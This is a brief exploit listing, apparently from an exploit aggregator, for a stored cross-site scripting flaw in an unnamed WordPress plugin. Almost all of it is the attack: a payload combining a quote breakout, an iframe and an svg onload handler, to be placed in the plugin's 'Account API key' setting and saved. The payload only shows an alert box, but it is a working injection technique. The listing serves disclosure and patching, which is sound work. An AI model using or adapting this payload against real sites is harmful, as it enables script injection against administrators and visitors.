Share
## https://sploitus.com/exploit?id=WPEX-ID:4889AD5A-C8C4-4958-B176-64560490497B
1. Add XSS payload to plugin's "Account API key" setting: "><iframe src="<svg onload=alert(4);>">

2. Save and see XSS exploit.